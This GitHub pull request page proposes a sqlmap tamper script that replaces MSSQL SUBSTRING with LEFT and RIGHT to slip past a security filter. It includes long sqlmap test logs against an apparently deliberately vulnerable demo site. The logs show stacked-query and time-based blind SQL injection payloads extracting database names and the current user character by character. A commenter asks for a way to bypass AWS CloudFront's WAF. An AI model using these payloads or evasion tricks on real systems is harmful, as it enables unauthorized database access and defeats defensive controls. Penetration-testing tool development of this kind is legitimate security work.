[tamper request] Replacing SUBSTRING by LEFT and RIGHT #2883
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
this-post
changed the title
|
Hello! any tamper to bypass AWS CloudFront WAF ? |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
I encountered that MSSQL SUBSTRING function was blocked by some kind of security control. So, I've utilized another substring-like function of MSSQL instead (LEFT and RIGHT).
Test run (verbose suppressed)
root@kali:~# sqlmap -u http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 --flush-session --dbms=mssql --tamper=substr2lr.py --threads 10 --dbs
(…snip…)
Parameter: id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=3;WAITFOR DELAY '0:0:5'--
[11:48:48] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:48:48] [INFO] testing Microsoft SQL Server
[11:48:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[11:48:55] [INFO] confirming Microsoft SQL Server
[11:49:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
[11:49:18] [INFO] fetching database names
[11:49:18] [INFO] fetching number of databases
[11:49:18] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[11:49:18] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
1
[11:49:57] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:50:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:50:42] [INFO] retrieved: acublog
[11:52:40] [INFO] retrieved: master
[11:54:22] [INFO] retrieved: tempdb
[11:56:29] [INFO] retrieved: model
[11:58:13] [INFO] retrieved: ms
[11:59:26] [ERROR] invalid character detected. retrying..
[11:59:26] [WARNING] increasing time delay to 6 seconds
db
[12:00:02] [INFO] retrieved: acublog
[12:02:21] [INFO] retrieved: acuservice
[12:05:21] [INFO] retrieved: acuf
[12:06:48] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[12:06:49] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
[12:06:49] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
orum
[12:09:55] [INFO] retrieved:
available databases [7]:
[] acublog
[] acuforum
[] acuservice
[] master
[] model
[] msdb
[*] tempdb
[12:09:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[12:09:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testaspnet.vulnweb.com'
Test run
root@kali:~# sqlmap -u http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 --flush-session --dbms=mssql --tamper=substr2lr.py --current-user -v3
(...snip...)
[12:26:56] [INFO] fetching current user
[12:26:56] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>64) WAITFOR DELAY '0:0:4'
[12:27:01] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>96) WAITFOR DELAY '0:0:4'
[12:27:05] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>112) WAITFOR DELAY '0:0:4'
[12:27:05] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>104) WAITFOR DELAY '0:0:4'
[12:27:08] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>108) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>106) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>105) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))!=105) WAITFOR DELAY '0:0:4'
[12:27:14] [ERROR] invalid character detected. retrying..
[12:27:14] [WARNING] increasing time delay to 5 seconds
[12:27:14] [DEBUG] turning off time auto-adjustment mechanism
[12:27:14] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>64) WAITFOR DELAY '0:0:5'
[12:27:19] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:24] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:25] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>104) WAITFOR DELAY '0:0:5'
[12:27:25] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>100) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>98) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>97) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))!=97) WAITFOR DELAY '0:0:5'
[12:27:27] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:32] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:32] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>104) WAITFOR DELAY '0:0:5'
[12:27:33] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>100) WAITFOR DELAY '0:0:5'
[12:27:33] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>98) WAITFOR DELAY '0:0:5'
[12:27:38] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>99) WAITFOR DELAY '0:0:5'
[12:27:38] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))!=99) WAITFOR DELAY '0:0:5'
[12:27:39] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:44] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:49] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>120) WAITFOR DELAY '0:0:5'
[12:27:50] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>116) WAITFOR DELAY '0:0:5'
[12:27:55] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>118) WAITFOR DELAY '0:0:5'
[12:27:55] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>117) WAITFOR DELAY '0:0:5'
[12:27:56] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))!=117) WAITFOR DELAY '0:0:5'
[12:27:56] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:01] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:02] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>104) WAITFOR DELAY '0:0:5'
[12:28:07] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>108) WAITFOR DELAY '0:0:5'
[12:28:12] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>110) WAITFOR DELAY '0:0:5'
[12:28:13] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>109) WAITFOR DELAY '0:0:5'
[12:28:18] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))!=110) WAITFOR DELAY '0:0:5'
[12:28:18] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>104) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>100) WAITFOR DELAY '0:0:5'
[12:28:29] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>102) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>101) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))!=101) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:36] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:41] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>120) WAITFOR DELAY '0:0:5'
[12:28:41] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>116) WAITFOR DELAY '0:0:5'
[12:28:42] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>114) WAITFOR DELAY '0:0:5'
[12:28:47] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>115) WAITFOR DELAY '0:0:5'
[12:28:52] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))!=116) WAITFOR DELAY '0:0:5'
[12:28:53] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:58] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:58] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>104) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>108) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>106) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>105) WAITFOR DELAY '0:0:5'
[12:29:05] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))!=105) WAITFOR DELAY '0:0:5'
[12:29:05] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>96) WAITFOR DELAY '0:0:5'
[12:29:10] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>112) WAITFOR DELAY '0:0:5'
[12:29:16] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>120) WAITFOR DELAY '0:0:5'
[12:29:16] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>116) WAITFOR DELAY '0:0:5'
[12:29:21] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>118) WAITFOR DELAY '0:0:5'
[12:29:27] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>119) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))!=120) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>96) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>48) WAITFOR DELAY '0:0:5'
[12:29:33] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>1) WAITFOR DELAY '0:0:5'
[12:29:33] [INFO] retrieved: acunetix
[12:29:33] [DEBUG] performed 68 queries in 156.57 seconds
current user: 'acunetix'
[12:29:33] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[12:29:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testaspnet.vulnweb.com'
[*] shutting down at 12:29:33